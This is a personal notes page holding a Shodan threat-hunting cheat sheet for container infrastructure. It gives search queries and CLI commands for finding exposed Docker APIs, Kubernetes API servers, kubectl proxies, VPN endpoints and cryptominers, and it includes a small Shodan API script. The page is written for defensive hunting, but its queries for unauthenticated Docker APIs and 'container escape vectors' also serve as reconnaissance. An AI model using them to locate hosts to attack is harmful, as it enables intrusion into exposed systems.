Prometheus Threat Hunting Shodan Cheat Sheet

Backup and proof needs for packetware prometheus article

[Big Balls Has Your Security Number. And a global “Black Box” network perfect for sending it anywhere in the world ](<./../Big-Balls-Has-Your-Security-Number.-And-a-global-Black-Box-network-perfect-for-sending-it-anywhere-in-the-world-.md> “Big Balls Has Your Security Number. And a global “Black Box” network perfect for sending it anywhere in the world ”)

big balls prometheus perplexity first pass

2025 01:58 AM

new packetware balls thoughts

big balls big picture

Packetware cyber assessment perplexity

# Kubernetes Container Forensic Shodan Threat Hunting Cheatsheet

**Container Infrastructure Discovery**

**Exposed Docker APIs**

```

“Docker Registry HTTP API” port:5000

“Docker-Distribution-Api-Version” port:5000

product:“Docker” port:2375,2376

“HTTP/1.1 401 Unauthorized” “Server: Docker” port:2375

```

**Kubernetes API Servers**

```

kubernetes port:6443

“Kubernetes” port:8080,8443,6443

“k8s” “API Server” port:6443

title:“Kubernetes API” 401

```

**Cilium Envoy Proxies**

```

“envoy” “cilium” port:9901

“server: envoy” “x-envoy”

product:“Envoy proxy” “cilium”

“x-envoy-upstream-service-time” cilium

```

**kubectl Proxy Detection**

```

“kubectl proxy” port:8001

“API Server proxy” kubectl

“127.0.0.1:8001” kubectl

```

**VPN & Covert Channels**

**Tailscale Detection**

```

“tailscale” port:41641

product:“Tailscale”

“100.64.0.0/10” tailscale

“fd7a:115c:a1e0” tailscale

```

**WireGuard/VPN Tunnels**

```

“WireGuard” port:51820

product:“WireGuard VPN”

“wg0” wireguard

```

**Mining & Malicious Activity**

**Cryptocurrency Miners**

```

“monero” “mining” port:4444,14444

“xmrig” “stratum”

“cryptonight” port:4444

“pool.supportxmr.com” mining

```

**Shodan-Aware Botnets**

```

“shodan” “docker” port:2375

“ubu.sh” “darwin” mining

“zoolu2” docker

```

**Monitoring Infrastructure**

**Prometheus Exporters**

```

“prometheus” “node_exporter” port:9100

“cadvisor” port:8080

“prometheus/2” metrics

“/metrics” prometheus port:9090

```

**Grafana Dashboards**

```

title:“Grafana” port:3000

“grafana” dashboard

“Welcome to Grafana” port:3000

```

**Container Network Analysis**

**High Bandwidth Containers**

```

org:“DigitalOcean” port:2375 country:CA

net:Montreal docker

“high traffic” container monitoring

```

**Exposed Container Stats**

```

“container_network_transmit_bytes” prometheus

“container_start_time” metrics

“tailscale0” network interface

```

**C2 Infrastructure Hunting**

**SSH Backdoors in Containers**

```

“SSH-2.0” port:22 “docker”

“root@” docker container

“SSH daemon” container port:22

```

**Proxy C2 Channels**

```

“SOCKS” proxy port:1080

“HTTP CONNECT” proxy tunnel

“envoy” proxy “upstream”

```

**Specific IOCs from Analysis**

**Based on Container Data**

```

“bitnami/kubectl” docker

“registry.k8s.io/kube-apiserver:v1.31.2”

“cilium/cilium-envoy” proxy

“10.0.8.190” high bandwidth

“montreal-core-1” traffic anomaly

```

**Search Syntax Examples**

```bash

# Find specific container images

shodan search “kubectl:latest” port:2375

# Monitor for new instances

shodan alert create “Exposed kubectl” “kubectl proxy” port:8001

# Geographic targeting

shodan search “docker” country:CA city:Montreal

# SSL certificate hunting

shodan search ssl.cert.subject.CN:“kubernetes”

# API endpoint discovery

shodan search “/v1/nodes” kubernetes

# Container escape vectors

shodan search “privileged” “docker” port:2375

# Persistence mechanisms

shodan search “systemd” “docker” container

```

**Network Forensic Integration**

**Traffic Correlation**

```promql

# Cross-reference with container metrics

rate(container_network_transmit_bytes_total[5m]) > 100000

# VPN tunnel monitoring

rate(node_network_transmit_bytes_total{device=“tailscale0”}[5m])

# Anomaly detection

container_start_time_seconds > (time() - 86400)

```

**API Integration Script**

```python

import shodan

api = shodan.Shodan(‘YOUR_API_KEY’)

# Monitor for new kubectl proxies

results = api.search(‘kubectl proxy port:8001’)

for result in results[‘matches’]:

print(f”Exposed kubectl: {result[‘ip_str’]}:{result[‘port’]}”)

# Alert on suspicious mining

api.create_alert(‘Mining Alert’, ‘monero docker port:2375’)

```

**Detection Evasion Indicators**

**Monitoring System Tampering**

```

“prometheus” “absent” metrics

“grafana” “disabled” alerts

“node_exporter” “down”

```

**Log Manipulation**

```

“rsyslog” “disabled” container

“journald” “stopped” docker

“/var/log” “readonly” mount

```

**Automation & Continuous Monitoring**

**Daily Scan Commands**

```bash

# Automated container hunting

shodan download —limit 1000 kubectl “kubectl proxy”

shodan download —limit 1000 docker-api “port:2375”

shodan download —limit 1000 k8s-api “kubernetes port:6443”

# Process results

shodan parse kubectl.json.gz —fields ip_str,port,data

```

**Alert Configuration**

```bash

# Create persistent monitoring

shodan alert create “Docker API” “port:2375 -authentication”

shodan alert create “K8s Exposed” “kubernetes port:6443 401”

shodan alert create “Cilium Proxy” “envoy cilium port:9901”

```

**Threat Intelligence Correlation**

Match discovered infrastructure against known threat actor TTPs:

- Cross-reference container images with malware databases

- Correlate IP addresses with botnet C2 infrastructure

- Validate certificates against threat intelligence feeds

- Monitor for domain generation algorithm patterns